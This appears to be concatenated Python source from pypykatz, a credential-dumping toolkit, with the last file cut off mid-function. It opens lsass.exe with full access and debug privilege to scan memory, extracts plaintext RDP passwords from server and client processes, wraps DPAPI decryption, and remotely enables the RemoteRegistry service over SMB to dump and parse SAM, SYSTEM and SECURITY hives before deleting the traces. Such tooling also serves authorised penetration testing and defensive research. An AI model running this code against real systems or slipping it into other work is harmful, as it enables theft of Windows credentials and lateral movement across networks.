		pos = []
		last_found = -1
		while True:
			last_found = self.current_segment.data.find(pattern, last_found + 1)
			if last_found == -1:
				break
			pos.append(last_found + self.current_segment.start_address)
			
		return pos
		
	def find_global(self, pattern):
		"""
		Searches for the pattern in the whole process memory space and returns the first occurrence.
		This is exhaustive!
		"""
		pos_s = self.reader.search(pattern)
		if len(pos_s) == 0:
			return -1
		
		return pos_s[0]
		
	def find_all_global(self, pattern, allocationprotect = 0x04):
		"""
		Searches for the pattern in the whole process memory space and returns a list of addresses where the pattern begins.
		This is exhaustive!
		"""
		return self.reader.search(pattern, allocationprotect = allocationprotect)
		
	def get_ptr(self, pos):
		self.move(pos)
		return self.read_uint()
		#raw_data = self.read(pos, self.sizeof_ptr)
		#return struct.unpack(self.unpack_ptr, raw_data)[0]
	
	def get_ptr_with_offset(self, pos):
		if self.reader.processor_architecture == PROCESSOR_ARCHITECTURE.AMD64:
			self.move(pos)
			ptr = int.from_bytes(self.read(4), byteorder = 'little', signed = True)
			return pos + 4 + ptr
		else:
			self.move(pos)
			return self.read_uint()
	
	def find_in_module(self, module_name, pattern, find_first = False, reverse_order = False):
		t = self.reader.search_module(module_name, pattern, find_first = find_first, reverse_order = reverse_order)
		return t
		
		
class LiveReader:
	def __init__(self, process_handle = None, process_name='lsass.exe', process_pid = None):
		self.processor_architecture = None
		self.process_name = process_name
		self.process_handle = process_handle
		self.process_pid = process_pid
		self.current_position = None
		self.BuildNumber = None
		self.modules = []
		self.pages = []
		
		self.msv_dll_timestamp = None #a special place in our hearts....
		
		self.sanity_check()
		self.setup()
		
	def sanity_check(self):
		"""
		Check if user is insane
		Windows API functions don't like when a 32 bit process is accessing a 64 bit process's memory space,
		Therefore you must use a 64 bit python on a 64bit Windows and a 32bit python on a 32bit Windows
		"""
		is_python_64 = sys.maxsize > 2**32
		is_windows = platform.system() == 'Windows'
		is_windows_64 = platform.machine().endswith('64')
		if is_windows == False:
			raise Exception('This will only run on Windows')
		
		if is_windows_64 != is_python_64:
			raise Exception('Python interpreter must be the same architecure of the OS you are running it on.')
		
	def setup(self):
		logger.log(1, 'Enabling debug privilege')
		enable_debug_privilege()
		logger.log(1, 'Getting generic system info')
		sysinfo = GetSystemInfo()
		self.processor_architecture = PROCESSOR_ARCHITECTURE(sysinfo.id.w.wProcessorArchitecture)
		
		logger.log(1, 'Getting build number')
		#self.BuildNumber = GetVersionEx().dwBuildNumber #this one doesnt work reliably on frozen binaries :(((
		key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, 'SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\')
		buildnumber, t = winreg.QueryValueEx(key, 'CurrentBuildNumber')
		self.BuildNumber = int(buildnumber)
		
		if self.process_handle is None:
			if self.process_pid is None:
				if self.process_name is None:
					raise Exception('Process name or PID or opened handle must be provided')
				
				logger.log(1, 'Searching for lsass.exe')
				self.process_pid = pid_for_name(self.process_name)
				logger.log(1, '%s found at PID %d' % (self.process_name, self.process_pid))
				logger.log(1, 'Checking Lsass.exe protection status')
				#proc_protection_info = get_protected_process_infos(pid)
				#protection_msg = "Protection Status: No protection"
				#if proc_protection_info:
				#	protection_msg = f"Protection Status: {proc_protection_info['type']}"
				#	if 'signer' in proc_protection_info:
				#		protection_msg += f" ({proc_protection_info['signer']})"
				#	raise Exception('Failed to open lsass.exe Reason: %s' % protection_msg)
				#logger.log(1, protection_msg)
			logger.log(1, 'Opening %s' % self.process_name)
			self.process_handle = OpenProcess(PROCESS_ALL_ACCESS, False, self.process_pid)
			if self.process_handle is None:
				raise Exception('Failed to open lsass.exe Reason: %s' % ctypes.WinError())
		else:
			logger.debug('Using pre-defined handle')
		logger.log(1, 'Enumerating modules')
		module_handles = EnumProcessModules(self.process_handle)
		for module_handle in module_handles:
			
			module_file_path = GetModuleFileNameExW(self.process_handle, module_handle)
			logger.log(1, module_file_path)
			timestamp = 0
			if ntpath.basename(module_file_path).lower() == 'msv1_0.dll':
				timestamp = int(os.stat(module_file_path).st_ctime)
				self.msv_dll_timestamp = timestamp
			modinfo = GetModuleInformation(self.process_handle, module_handle)
			self.modules.append(Module.parse(module_file_path, modinfo, timestamp))
			
		logger.log(1, 'Found %d modules' % len(self.modules))
			
		current_address = sysinfo.lpMinimumApplicationAddress
		while current_address < sysinfo.lpMaximumApplicationAddress:
			page_info = VirtualQueryEx(self.process_handle, current_address)
			self.pages.append(Page.parse(page_info))
			
			current_address += page_info.RegionSize
			
		logger.log(1, 'Found %d pages' % len(self.pages))
		
		
		for page in self.pages:
			for mod in self.modules:
				if mod.inrange(page.BaseAddress) == True:
					mod.pages.append(page)

	def get_handler(self):
		return self.process_handle

	def get_memory(self, allocationprotect = 0x04):
		t = []
		for page in self.pages:
			if page.AllocationProtect & allocationprotect:
				t.append(page)
		return t

	def get_buffered_reader(self):
		return BufferedLiveReader(self)			
		
	def get_module_by_name(self, module_name):
		for mod in self.modules:
			if mod.name.lower().find(module_name.lower()) != -1:
				return mod
		return None	
	
	def search_module(self, module_name, pattern, find_first = False, reverse_order = False):
		mod = self.get_module_by_name(module_name)
		if mod is None:
			raise Exception('Could not find module! %s' % module_name)
		needles = []
		for page in mod.pages:
			needles += page.search(pattern, self.process_handle)
			if len(needles) > 0 and find_first is True:
				return needles

		return needles

	def search(self, pattern, allocationprotect = 0x04):
		t = []
		for page in self.pages:
			if page.AllocationProtect & allocationprotect:
				t += page.search(pattern, self.process_handle)
		return t
		
if __name__ == '__main__':
	logger.basicConfig(level=1)
	lr = LiveReader()
	blr = lr.get_buffered_reader()
	
	blr.move(0x1000)
	


#!/usr/bin/env python3
#
# Author:
#  Tamas Jos (@skelsec)
#

from pypykatz.rdp.parser import RDPCredParser



class RDPCMDHelper:
	def __init__(self):
		self.live_keywords = ['rdp']
		self.keywords = ['rdp']
		
	def add_args(self, parser, live_parser):
		# live
		live_group = live_parser.add_parser('rdp', help='a')
		live_rdp_subparsers = live_group.add_subparsers()
		live_rdp_subparsers.required = True
		live_rdp_subparsers.dest = 'live_rdp_module'

		live_logonpasswords_group = live_rdp_subparsers.add_parser('logonpasswords', help='Parse RDP credentials (SERVER side)')
		live_logonpasswords_group.add_argument('--pid', type=int, help = 'Search a specific process PID for RDP creds')
		live_logonpasswords_group.add_argument('--all', action='store_true', help = 'Looks for all processes which use the rdp DLL rdpcorets.dll')

		live_mstsc_group = live_rdp_subparsers.add_parser('mstsc', help='Parse RDP credentials (CLIENT side)')
		live_mstsc_group.add_argument('--pid', type=int, help = 'Search a specific process PID for RDP creds')
		live_mstsc_group.add_argument('--all', action='store_true', help = 'Looks for all processes which use the rdp DLL mstscax.dll')

		# offline
		group = parser.add_parser('rdp', help='Parse RDP credentials from minidump file')
		rdp_subparsers = group.add_subparsers()
		rdp_subparsers.required = True
		rdp_subparsers.dest = 'rdp_module'

		logonpasswords_group = rdp_subparsers.add_parser('logonpasswords', help='Parse RDP credentials (SERVER side) from minidump file. Plain-text passwords only for WINVER <= Win2012')
		logonpasswords_group.add_argument('cmd', choices=['minidump'])
		logonpasswords_group.add_argument('memoryfile', help='path to the dump file')

		mstsc_group = rdp_subparsers.add_parser('mstsc', help='Parse RDP credentials (CLIENT side) from minidump file. Unable to recover plain-text passwords offline.')
		mstsc_group.add_argument('cmd', choices=['minidump'])
		mstsc_group.add_argument('memoryfile', help='path to the dump file')

	def execute(self, args):
		if len(self.keywords) > 0 and args.command in self.keywords:
			self.run(args)
		
		if len(self.live_keywords) > 0 and args.command == 'live' and args.module in self.live_keywords:
			self.run_live(args)
		
	def run_live(self, args):
		credparsers = RDPCredParser.go_live(pid = args.pid, all_rdp = args.all, live_rdp_module = args.live_rdp_module)
		for credparser in credparsers:
			for cred in credparser.credentials:
				print(str(cred))
				
	def run(self, args):
		credparsers = RDPCredParser.parse_minidump_file(args.memoryfile, args.rdp_module)
		for credparser in credparsers:
			for cred in credparser.credentials:
				print(str(cred))


from ctypes import byref, Structure, c_char, c_buffer, string_at, windll, c_void_p, c_uint32, POINTER, c_wchar_p, WinError

LPWSTR      = c_wchar_p
LPVOID      = c_void_p
PVOID       = LPVOID
PPVOID      = POINTER(PVOID)
DWORD       = c_uint32

def RaiseIfZero(result, func = None, arguments = ()):
    """
    Error checking for most Win32 API calls.

    The function is assumed to return an integer, which is C{0} on error.
    In that case the C{WindowsError} exception is raised.
    """
    if not result:
        raise WinError()
    return result

class DATA_BLOB(Structure):
	_fields_ = [
		('cbData', DWORD),
		('pbData', POINTER(c_char))
	]
PDATA_BLOB = POINTER(DATA_BLOB)

# https://docs.microsoft.com/en-us/windows/win32/api/dpapi/nf-dpapi-cryptunprotectdata
def CryptUnprotectData(enc_blob, entropy = None, to_prompt = False):
	_CryptUnprotectData = windll.crypt32.CryptUnprotectData
	_CryptUnprotectData.argtypes = [PDATA_BLOB, LPWSTR, PDATA_BLOB, PVOID, DWORD, DWORD, PDATA_BLOB]
	_CryptUnprotectData.restype = bool
	_CryptUnprotectData.errcheck = RaiseIfZero
	
	buffer_in      = c_buffer(enc_blob, len(enc_blob))
	blob_in        = DATA_BLOB(len(enc_blob), buffer_in)
	blob_out       = DATA_BLOB()

	if entropy is not None:
		buffer_entropy = c_buffer(entropy, len(entropy))
		blob_entropy   = DATA_BLOB(len(entropy), buffer_entropy)
		_CryptUnprotectData(byref(blob_in), None, byref(blob_entropy), None, None, 0, byref(blob_out))
	else:
		_CryptUnprotectData(byref(blob_in), None, None, None, 0, 0, byref(blob_out))

	dec_data = string_at(blob_out.pbData, blob_out.cbData)
	return dec_data

if __name__ == '__main__':
	enc_data = bytes.fromhex('01000000d08c9ddf0115d1118c7a00c04fc297eb010000005f3d1f4bf6f35b469eb9719205c9c1160000000002000000000003660000c000000010000000ef8ad11a2c0a0fa867c4bc8ea535c3b10000000004800000a000000010000000beb718a641f76dff7fb9f6edb0da69061800000068cdb387e412d6e097cd7db04af8638247b9b4987cd5048714000000bb10d25466234b082ac4052360ed3d57e8951367')
	dec_data = CryptUnprotectData(enc_data)
	print(dec_data)



import asyncio
import os

from pypykatz import logger
from aiosmb.examples.smbshareenum import SMBFileEnum, ListTargetGen, FileTargetGen


async def regdump(url, hives = ['HKLM\\SAM', 'HKLM\\SYSTEM', 'HKLM\\SECURITY'], remote_base_path = 'C:\\Windows\\Temp\\', remote_share_name = '\\c$\\Windows\\Temp\\', enable_wait = 3, targets = [], worker_cnt = 5):
	from aiosmb.commons.connection.factory import SMBConnectionFactory
	
	base_url = None
	base_conn = None
	mimis = []
	workers = []

	tgens = []
	if targets is not None and len(targets) != 0:
		notfile = []
		if targets is not None:
			for target in targets:
				try:
					f = open(target, 'r')
					f.close()
					tgens.append(FileTargetGen(target))
				except:
					notfile.append(target)
			
			if len(notfile) > 0:
				tgens.append(ListTargetGen(notfile))

	if isinstance(url, SMBConnectionFactory):
		base_url = url
		base_conn = url.get_connection()
	else:
		base_url = SMBConnectionFactory.from_url(url)
		base_conn = base_url.get_connection()
	
	regdump_coro = regdump_single(
		base_conn.target.get_hostname_or_ip(), 
		base_conn, 
		hives = hives, 
		remote_base_path = remote_base_path, 
		remote_share_name = remote_share_name, 
		enable_wait = enable_wait
	)
	workers.append(regdump_coro)

	for tgen in tgens:
		async for _, target, err in tgen.generate():
			tconn = base_url.create_connection_newtarget(target)
			regdump_coro = regdump_single(
				tconn.target.get_hostname_or_ip(),
				tconn, 
				hives = hives, 
				remote_base_path = remote_base_path, 
				remote_share_name = remote_share_name, 
				enable_wait = enable_wait
			)
			workers.append(regdump_coro)
			if len(workers) >= worker_cnt:
				tres = await asyncio.gather(*workers)
				for res in tres:
					yield res
				workers = []

	if len(workers) > 0:
		tres = await asyncio.gather(*workers)
		for res in tres:
			yield res
		workers = []


async def regdump_single(targetid, connection, hives = ['HKLM\\SAM', 'HKLM\\SYSTEM', 'HKLM\\SECURITY'], remote_base_path = 'C:\\Windows\\Temp\\', remote_share_name = '\\c$\\Windows\\Temp\\', enable_wait = 3):
	try:
		from aiosmb.commons.interfaces.machine import SMBMachine
		from aiosmb.commons.interfaces.file import SMBFile
		from aiosmb.dcerpc.v5.common.service import SMBServiceStatus
		from pypykatz.alsadecryptor.asbmfile import SMBFileReader
		from pypykatz.registry.aoffline_parser import OffineRegistry

		
		if remote_base_path.endswith('\\') is False:
			remote_base_path += '\\'

		if remote_share_name.endswith('\\') is False:
			remote_share_name += '\\'

		po = None

		async with connection:
			logger.debug('[REGDUMP] Connecting to server...')
			_, err = await connection.login()
			if err is not None:
				raise err
			
			logger.debug('[REGDUMP] Connected to server!')
			async with SMBMachine(connection) as machine:
				logger.debug('[REGDUMP] Checking remote registry service status...')
				status, err = await machine.check_service_status('RemoteRegistry')
				if err is not None:
					raise err
				
				logger.debug('[REGDUMP] Remote registry service status: %s' % status.name)
				if status != SMBServiceStatus.RUNNING:
					logger.debug('[REGDUMP] Enabling Remote registry service')
					_, err = await machine.enable_service('RemoteRegistry')
					if err is not None:
						raise err
					logger.debug('[REGDUMP] Starting Remote registry service')
					_, err = await machine.start_service('RemoteRegistry')
					if err is not None:
						raise err

					await asyncio.sleep(enable_wait)

				
				
				logger.debug('[REGDUMP] Remote registry service should be running now...')
				files = {}
				for hive in hives:
					fname = '%s.%s' % (os.urandom(4).hex(), os.urandom(3).hex())
					remote_path = remote_base_path + fname
					remote_sharepath = remote_share_name + fname
					remote_file = SMBFileReader(SMBFile.from_remotepath(connection, remote_sharepath))
					files[hive.split('\\')[1].upper()] = remote_file
					
					logger.info('[REGDUMP] Dumping reghive %s to (remote) %s' % (hive, remote_path))
					_, err = await machine.save_registry_hive(hive, remote_path)
					if err is not None:
						raise err
				
				#await asyncio.sleep(1)
				for rfilename in files:
					rfile = files[rfilename]
					logger.debug('[REGDUMP] Opening reghive file %s' % rfilename)
					_, err = await rfile.open(connection)
					if err is not None:
						raise err
				
				try:
					logger.debug('[REGDUMP] Parsing hives...')
					po = await OffineRegistry.from_async_reader(
						files['SYSTEM'], 
						sam_reader = files.get('SAM'), 
						security_reader = files.get('SECURITY'), 
						software_reader = files.get('SOFTWARE')
					)
				except Exception as e:
					print(e)
				
				logger.debug('[REGDUMP] Hives parsed OK!')
				
				logger.debug('[REGDUMP] Deleting remote files...')
				err = None
				for rfilename in files:
					rfile = files[rfilename]
					err = await rfile.close()
					if err is not None:
						logger.info('[REGDUMP] ERR! Failed to close hive dump file! %s' % rfilename)

					_, err = await rfile.delete()
					if err is not None:
						logger.info('[REGDUMP] ERR! Failed to delete hive dump file! %s' % rfilename)
				
				if err is None:
					logger.info('[REGDUMP] Deleting remote files OK!')
		
		return targetid, po, None
	except Exception as e:
		return targetid, None, e

			

async def regfile(url, system, sam = None, security = None, software = None, smb_basepath = None):
	from aiosmb.commons.connection.factory import SMBConnectionFactory
	from aiosmb.commons.interfaces.file import SMBFile
	from pypykatz.alsadecryptor.asbmfile import SMBFileReader
	from pypykatz.registry.aoffline_parser import OffineRegistry

	smburl = SMBConnectionFactory.from_url(url)
	connection = smburl.get_connection()

	if smb_basepath is None:
		smb_basepath = smburl.path
	if smb_basepath.endswith('/') is False:
		smb_basepath += '/'
	smb_basepath = smb_basepath.replace('/', '\\')
			
	system_smbfile_path = smb_basepath + system
	sam_smbfile = None
	security_smbfile = None
	software_smbfile = None


	system_smbfile = SMBFileReader(SMBFile.from_remotepath(connection, system_smbfile_path))

	if sam:
		sam_smbfile_path = smb_basepath + sam
		sam_smbfile = SMBFileReader(SMBFile.from_remotepath(connection, sam_smbfile_path))
			
	if security:
		security_smbfile_path = smb_basepath + security
		security_smbfile = SMBFileReader(SMBFile.from_remotepath(connection, security_smbfile_path))
			
	if software:
		software_smbfile_path = smb_basepath + software
		software_smbfile = SMBFileReader(SMBFile.from_remotepath(connection, software_smbfile_path))

	po = None
	async with connection:
		logger.debug('[REGFILE] Connecting to server...')
		_, err = await connection.login()
		if err is not None:
			raise err
		
		logger.debug('[REGFILE] Connected to server!')
		logger.debug('[REGFILE] Opening SYSTEM hive dump file...')
		# parse files here
		_, err = await system_smbfile.open(connection)
		if err is not None:
			raise err

		if sam_smbfile is not None:
			logger.debug('[REGFILE] Opening SAM hive dump file...')
			_, err = await sam_smbfile.open(connection)
			if err is not None:
				raise err
				
		if security_smbfile is not None:
			logger.debug('[REGFILE] Opening SECURITY hive dump file...')
			_, err = await security_smbfile.open(connection)
			if err is not None:
				raise err
				
		if software_smbfile is not None:
			logger.debug('[REGFILE] Opening SOFTWARE hive dump file...')
			_, err = await software_smbfile.open(connection)
			if err is not None:
				raise err
		
		logger.debug('[REGFILE] All files opened OK!')
		logger.debug('[REGFILE] Parsing hive files...')
		po = await OffineRegistry.from_async_reader(system_smbfile, sam_reader = sam_smbfile, security_reader = security_smbfile, software_reader = software_smbfile)
		logger.debug('[REGFILE] Hive files parsed OK!')

	return po



from pypykatz.commons.common import KatzSystemArchitecture, WindowsBuild, WindowsMinBuild
from pypykatz.commons.win_datatypes import POINTER, ULONG, \
	KIWI_GENERIC_PRIMARY_CREDENTIAL, PVOID, DWORD, LUID, \
	LSA_UNICODE_STRING, WORD
from minidump.win_datatypes import PCWSTR
from pypykatz.commons.common import hexdump

class RDPCredsTemplate:
	def __init__(self):
		self.signatures = None
		self.signature = None

		self.cred_struct = None
		self.property_struct = None
		self.properties_struct = None

	@staticmethod
	def get_logonpasswords_template(sysinfo):
		template = RDPCredsTemplate()

		if sysinfo.buildnumber >= WindowsBuild.WIN_8.value:
			template.signatures = [b'\x00\x00\x00\x00\xbb\x47', b'\x00\x00\x00\x00\xf3\x47', b'\x00\x00\x00\x00\x3b\x01']
			template.offset = 0
			template.cred_struct = WTS_KIWI
		
		else:
			template.signatures = [b'\xc8\x00\x00\x00\xc8\x00\x00\x00']
			template.offset = 16
			template.cred_struct = WTS_KIWI_2008R2
		
		return template

	@staticmethod
	def get_mstsc_template():
		template = RDPCredsTemplate()

		template.signature = b'\xcd\xab\xca\xdb\x03'
		template.property_struct = TS_PROPERTY_KIWI
		template.properties_struct = TS_PROPERTIES_KIWI
		
		return template

# See mimikatz/modules/kuhl_m_ts.h
class PTS_PROPERTY_KIWI(POINTER):
	def __init__(self, reader):
		super().__init__(reader, TS_PROPERTY_KIWI)

class TS_PROPERTY_KIWI:
	def __init__(self, reader):
		reader.align()
		self.szProperty = PCWSTR(reader).value
		self.dwType = DWORD(reader).value
		reader.align()
		self.pvData = PVOID(reader).value
		self.unkp0 = PVOID(reader).value
		self.unkd0 = DWORD(reader).value
		self.dwFlags = DWORD(reader).value
		self.unkd1 = DWORD(reader).value
		self.unkd2 = DWORD(reader).value
		self.pValidator = PVOID(reader).value
		self.unkp2 = PVOID(reader).value
		self.unkp3 = PVOID(reader).value

class TS_PROPERTIES_KIWI:
	def __init__(self, reader):
		#self.unkp0 = PVOID(reader).value
		#self.unkp1 = PVOID(reader).value 
		self.unkh0 = DWORD(reader).value # 0xdbcaabcd
		self.unkd0 = DWORD(reader).value # 3
		self.unkp2 = PVOID(reader).value
		self.unkd1 = DWORD(reader).value # 45
		reader.align()
		self.unkp3 = PVOID(reader).value
		reader.align()
		self.pProperties_addr = reader.tell()
		self.pProperties = PVOID(reader)#PTS_PROPERTY_KIWI(reader)
		self.cbProperties = DWORD(reader).value

class WTS_KIWI:
	def __init__(self, reader):
		self.unk0 = DWORD(reader)
		self.unk1 = DWORD(reader)
		self.cbDomain = WORD(reader).value
		self.cbUsername = WORD(reader).value
		self.cbPassword = WORD(reader).value
		self.unk2 = DWORD(reader)
		self.Domain = reader.read(512)
		self.UserName = reader.read(512)
		self.Password_addr = reader.tell()
		self.Password = reader.read(512)

class WTS_KIWI_2008R2:
	def __init__(self, reader):
		self.unk0 = DWORD(reader)
		self.unk1 = DWORD(reader)
		self.cbDomain = WORD(reader).value + 511 #making it compatible with the other version. this is probably a bool?
		self.cbUsername = WORD(reader).value + 511
		self.cbPassword = WORD(reader).value + 511
		self.unk2 = DWORD(reader)
		self.Domain = reader.read(512)
		self.UserName = reader.read(512)
		self.Password_addr = reader.tell()
		self.Password = reader.read(512)


import enum
import datetime
import ctypes
from ctypes import wintypes

from pypykatz.commons.winapi.local.function_defs.defines import *
from pypykatz.commons.winapi.local.function_defs.netapi32_high import *

"""
D: NetShareEnum 
NetWkstaUserEnum
D: NetSessionEnum
D: NetLocalGroupGetMembers
DsGetSiteName
DsEnumerateDomainTrusts
D: NetApiBufferFree
"""

LMSTR = LPWSTR
MAX_PREFERRED_LENGTH = -1

# http://qaru.site/questions/901246/howto-determine-file-owner-on-windows-using-python-without-pywin32	
class SID_NAME_USE(wintypes.DWORD):
    _sid_types = dict(enumerate('''
        User Group Domain Alias WellKnownGroup DeletedAccount
        Invalid Unknown Computer Label'''.split(), 1))

    def __init__(self, value=None):
        if value is not None:
            if value not in self.sid_types:
                raise ValueError('invalid SID type')
            wintypes.DWORD.__init__(value)

    def __str__(self):
        if self.value not in self._sid_types:
            raise ValueError('invalid SID type for value: %s' % self.value)
        return self._sid_types[self.value]

    def __repr__(self):
        return 'SID_NAME_USE(%s)' % self.value

PSID_NAME_USE = ctypes.POINTER(SID_NAME_USE)


PSID_NAME_USE = ctypes.POINTER(SID_NAME_USE)

class FILE_INFO_2(Structure): 
	_fields_ = [
		('fid',DWORD),
	]
PFILE_INFO_2 = POINTER(FILE_INFO_2)

class FILE_INFO_3(Structure): 
	_fields_ = [
		('fid',DWORD),
		('permissions',DWORD),
		('num_locks',DWORD),
		('pathname',LMSTR),
		('username',LMSTR),
	]
PFILE_INFO_3 = POINTER(FILE_INFO_3)
 
class SHARE_INFO_0(Structure): 
	_fields_ = [
		('netname',LMSTR),
	]
PSHARE_INFO_0 = POINTER(SHARE_INFO_0)

class SHARE_INFO_1(Structure): 
	_fields_ = [
		('netname',LMSTR),
		('type',DWORD ),
		('remark',LMSTR ),
	]
PSHARE_INFO_1 = POINTER(SHARE_INFO_1)

class SHARE_INFO_2(Structure): 
	_fields_ = [
		('netname',LMSTR),
		('type',DWORD ),
		('remark',LMSTR ),
		('permissions',DWORD ),
		('max_uses',DWORD ),
		('current_uses',DWORD ),
		('path',LMSTR),
		('passwd',LMSTR),
	]
PSHARE_INFO_2 = POINTER(SHARE_INFO_2)

class SHARE_INFO_501(Structure): 
	_fields_ = [
		('netname',LMSTR),
		('type',DWORD ),
		('remark',LMSTR ),
		('flags',DWORD ),
	]
PSHARE_INFO_501 = POINTER(SHARE_INFO_501)

class SHARE_INFO_502(Structure): 
	_fields_ = [
		('netname',LMSTR),
		('type',DWORD ),
		('remark',LMSTR ),
		('permissions',DWORD ),
		('max_uses',DWORD ),
		('current_uses',DWORD ),
		('path',LMSTR),
		('passwd',LMSTR),
		('reserved',DWORD),
	]
PSHARE_INFO_502 = POINTER(SHARE_INFO_502)

class SHARE_INFO_503(Structure): 
	_fields_ = [
		('netname',LMSTR),
		('type',DWORD ),
		('remark',LMSTR ),
		('permissions',DWORD ),
		('max_uses',DWORD ),
		('current_uses',DWORD ),
		('path',LMSTR),
		('passwd',LMSTR),
		('servername',LMSTR),
		('reserved',DWORD),
	]
PSHARE_INFO_503 = POINTER(SHARE_INFO_503)


class SESSION_INFO_0(Structure): 
	_fields_ = [
		('cname',LMSTR),
	]
PSESSION_INFO_0 = POINTER(SESSION_INFO_0)

class SESSION_INFO_10(Structure): 
	_fields_ = [
		('cname',LMSTR),
		('username',LMSTR),
		('time',DWORD),
		('idle_time',DWORD)
	]
PSESSION_INFO_10 = POINTER(SESSION_INFO_10)

class SESSION_INFO_1(Structure): 
	_fields_ = [
		('cname',LMSTR),
		('username',LMSTR),
		('num_opens',DWORD),
		('time',DWORD),
		('idle_time',DWORD),
		('user_flags',DWORD),
	]
PSESSION_INFO_1 = POINTER(SESSION_INFO_1)

class SESSION_INFO_2(Structure): 
	_fields_ = [
		('cname',LMSTR),
		('username',LMSTR),
		('num_opens',DWORD),
		('time',DWORD),
		('idle_time',DWORD),
		('user_flags',DWORD),
		('cltype_name',LMSTR),
	]
PSESSION_INFO_2 = POINTER(SESSION_INFO_2)

class SESSION_INFO_502(Structure): 
	_fields_ = [
		('cname',LMSTR),
		('username',LMSTR),
		('num_opens',DWORD),
		('time',DWORD),
		('idle_time',DWORD),
		('user_flags',DWORD),
		('cltype_name',LMSTR),
		('transport',LMSTR),
	]
PSESSION_INFO_502 = POINTER(SESSION_INFO_502)

class LOCALGROUP_MEMBERS_INFO_0(Structure): 
	_fields_ = [
		('sid',PSID),
	]
PLOCALGROUP_MEMBERS_INFO_0 = POINTER(LOCALGROUP_MEMBERS_INFO_0)

class LOCALGROUP_MEMBERS_INFO_1(Structure): 
	_fields_ = [
		('sid',PSID),
		('sidusage',DWORD),
		('name',LMSTR),
	]
PLOCALGROUP_MEMBERS_INFO_1 = POINTER(LOCALGROUP_MEMBERS_INFO_1)

class LOCALGROUP_MEMBERS_INFO_2(Structure): 
	_fields_ = [
		('sid',PSID),
		('sidusage',DWORD),
		('domainandname',LMSTR),
	]
PLOCALGROUP_MEMBERS_INFO_2 = POINTER(LOCALGROUP_MEMBERS_INFO_2)

class LOCALGROUP_MEMBERS_INFO_3(Structure): 
	_fields_ = [
		('domainandname',LMSTR),
	]
PLOCALGROUP_MEMBERS_INFO_3 = POINTER(LOCALGROUP_MEMBERS_INFO_3)
	
class NetSessionEnumRes(enum.Enum):
	ERROR_ACCESS_DENIED = 5
	ERROR_INVALID_LEVEL = 124
	ERROR_INVALID_PARAMETER = 87
	ERROR_NOT_ENOUGH_MEMORY = 8
	NERR_ClientNameNotFound = 2312
	NERR_InvalidComputer = (2100 + 251)
	ERROR_FILE_NOT_FOUND = 2
	NERR_FileIdNotFound = 2314
	NERR_SUCCESS= 0
	ERROR_MORE_DATA = 234


# https://docs.microsoft.com/en-us/windows/desktop/api/lmapibuf/nf-lmapibuf-netapibufferfree
def NetApiBufferFree(pbuff):
	_NetApiBufferFree = windll.Netapi32.NetApiBufferFree
	_NetApiBufferFree.argtypes = [PVOID]
	_NetApiBufferFree.restype  = DWORD
	
	_NetApiBufferFree(pbuff)
	

# https://docs.microsoft.com/en-us/windows/desktop/api/lmshare/nf-lmshare-netsessionenum
def NetSessionEnum(servername = None, clientname = None, username = None, level = 10):
	def errc(result, func, arguments):
		r = NetSessionEnumRes(result)
		if r == NetSessionEnumRes.NERR_SUCCESS or r == NetSessionEnumRes.ERROR_MORE_DATA:
			return r
		raise Exception('NetSessionEnum exception! %s' % r)
		
	_NetSessionEnum = windll.Netapi32.NetSessionEnum
	_NetSessionEnum.argtypes = [LMSTR, LMSTR, LMSTR, DWORD, PVOID, DWORD, LPDWORD ,LPDWORD , LPDWORD ]
	_NetSessionEnum.restype  = DWORD
	_NetSessionEnum.errcheck  = errc
	
	buf = PVOID()
	entriesread = DWORD()
	totalentries = DWORD()
	resume_handle = DWORD(0)
	
	
	if servername:
		servername = LPWSTR(servername)
	if clientname:
		clientname = LPWSTR(clientname)
	if username:
		username = LPWSTR(username)
	
	if level == 0:
		si_type = SESSION_INFO_0
	elif level == 1:
		si_type = SESSION_INFO_1
	elif level == 2:
		si_type = SESSION_INFO_2
	elif level == 10:
		si_type = SESSION_INFO_10
	elif level == 502:
		si_type = SESSION_INFO_502
	
	else:
		raise Exception('NetSessionEnum unsupported level %s' % level)
	
	
	first_call = True
	sessions = []
	entries_read_total = 0
	while resume_handle.value != 0 or first_call:
		res = _NetSessionEnum(servername, clientname, username, level, byref(buf), MAX_PREFERRED_LENGTH, byref(entriesread), byref(totalentries), byref(resume_handle))
		first_call = False
		entries_read_total += entriesread.value
		if entriesread.value > 0:
			map = ctypes.cast(buf, POINTER(si_type*entriesread.value))
			for i in range(entriesread.value):
				sessions.append(UserSessionInfo.from_session_info(map.contents[i], level))
			NetApiBufferFree(buf)
			
		if entries_read_total == totalentries.value:
			break
		
	return sessions
	
def NetLocalGroupGetMembers(servername = None, localgroupname = None, level = 2):
	def errc(result, func, arguments):
		r = NetSessionEnumRes(result)
		if r == NetSessionEnumRes.NERR_SUCCESS or r == NetSessionEnumRes.ERROR_MORE_DATA:
			return r
		raise Exception('NetSessionEnum exception! %s' % r)
		
	_NetLocalGroupGetMembers = windll.Netapi32.NetLocalGroupGetMembers
	_NetLocalGroupGetMembers.argtypes = [LMSTR, LMSTR, DWORD, PVOID, DWORD, LPDWORD ,LPDWORD , LPDWORD]
	_NetLocalGroupGetMembers.restype  = DWORD
	_NetLocalGroupGetMembers.errcheck  = errc
	
	buf = PVOID()
	entriesread = DWORD()
	totalentries = DWORD()
	resume_handle = DWORD(0)
	
	if servername:
		servername = LPWSTR(servername)
	if localgroupname:
		localgroupname = LPWSTR(localgroupname)
	
	if level == 0:
		si_type = LOCALGROUP_MEMBERS_INFO_0
	elif level == 1:
		si_type = LOCALGROUP_MEMBERS_INFO_1
	elif level == 2:
		si_type = LOCALGROUP_MEMBERS_INFO_2
	elif level == 3:
		si_type = LOCALGROUP_MEMBERS_INFO_3
	
	else:
		raise Exception('NetLocalGroupGetMembers unsupported level %s' % level)
		
	first_call = True
	groupinfos = []
	entries_read_total = 0
	while resume_handle.value != 0 or first_call:
		res = _NetLocalGroupGetMembers(servername, localgroupname, level, byref(buf), MAX_PREFERRED_LENGTH, byref(entriesread), byref(totalentries), byref(resume_handle))
		first_call = False
		entries_read_total += entriesread.value
		if entriesread.value > 0:
			map = ctypes.cast(buf, POINTER(si_type*entriesread.value))
			for i in range(entriesread.value):
				groupinfos.append(LocalGroupInfo.from_struct(map.contents[i], level))
			NetApiBufferFree(buf)
			
		if entries_read_total == totalentries.value:
			break
	
	return groupinfos
	
def NetShareEnum(servername = None, level = 2):
	def errc(result, func, arguments):
		r = NetSessionEnumRes(result)
		if r == NetSessionEnumRes.NERR_SUCCESS or r == NetSessionEnumRes.ERROR_MORE_DATA:
